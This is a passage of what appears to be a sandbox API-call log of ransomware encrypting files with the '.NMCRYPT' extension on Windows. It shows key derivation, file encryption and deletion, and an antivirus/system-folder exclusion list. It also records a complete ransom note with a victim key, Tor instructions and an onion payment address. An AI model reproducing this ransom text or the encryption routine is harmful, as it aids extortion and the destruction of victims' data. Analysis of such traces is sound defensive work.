CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.731] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.731] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.731] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.731] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.731] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.731] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.731] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0158.731] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.731] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad8b8) returned 1 [0158.731] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0158.731] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0158.731] wcslen (_String="\\\\?\\") returned 0x4 [0158.731] CryptDuplicateKey (in: hKey=0x9ad8b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad638) returned 1 [0158.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0158.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0158.732] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=3823) returned 1 [0158.732] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0158.733] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.079] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.079] GetLastError () returned 0x0 [0159.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.080] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.080] GetLastError () returned 0x0 [0159.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.080] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.080] GetLastError () returned 0x0 [0159.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.080] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.080] GetLastError () returned 0x0 [0159.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.080] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.080] GetLastError () returned 0x0 [0159.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.081] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.081] GetLastError () returned 0x0 [0159.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.081] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.081] GetLastError () returned 0x0 [0159.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.081] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.081] GetLastError () returned 0x0 [0159.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.081] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.081] GetLastError () returned 0x0 [0159.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.081] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.081] GetLastError () returned 0x0 [0159.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.081] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.081] GetLastError () returned 0x0 [0159.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.082] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.082] GetLastError () returned 0x0 [0159.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.082] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.082] GetLastError () returned 0x0 [0159.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0159.082] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0159.082] GetLastError () returned 0x0 [0159.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0159.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0xef, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0xef, lpOverlapped=0x0) returned 1 [0159.082] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xef, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xf0) returned 1 [0159.082] GetLastError () returned 0x0 [0159.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xf0, lpOverlapped=0x0) returned 1 [0159.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0159.082] WriteFile (in: hFile=0x588, lpBuffer=0x607d70*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0159.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml")) returned 0x20 [0159.082] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml", dwFileAttributes=0x20) returned 0 [0159.083] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 1 [0159.083] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml")) returned 0 [0159.083] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" [0159.083] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 1 [0159.083] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXE0B1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxe0b1.tmp")) returned 0xe0b1 [0159.084] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXE0B1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxe0b1.tmp"), dwFlags=0x1) returned 0 [0159.084] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXE0B1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxe0b1.tmp")) returned 1 [0159.084] CryptDestroyKey (hKey=0x9ad638) returned 1 [0159.084] wcslen (_String="OK") returned 0x2 [0159.084] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.085] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.085] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0159.085] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0159.085] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0159.085] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0159.085] GetLastError () returned 0x12 [0159.085] FindClose (in: hFindFile=0x9ad138 | out: hFindFile=0x9ad138) returned 1 [0159.085] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.085] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.086] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.086] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.086] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.086] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.086] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.086] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.086] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*.exe") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*.dll") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*.lnk") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*.bat") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*.ini") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*.msi") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*.scf") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*pagefile.sys*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*AppData*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\winrar\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\java\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\windows\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\ESET\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\AVG\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*Atheros*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*Realtek*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*bootmgr*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*boot*") returned 0 [0159.086] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*boot*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*IO.SYS*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*ntldr*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*chrome*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*opera*") returned 0 [0159.087] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", pszSpec="*firefox*") returned 0 [0159.087] wcslen (_String="\\\\?\\") returned 0x4 [0159.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft 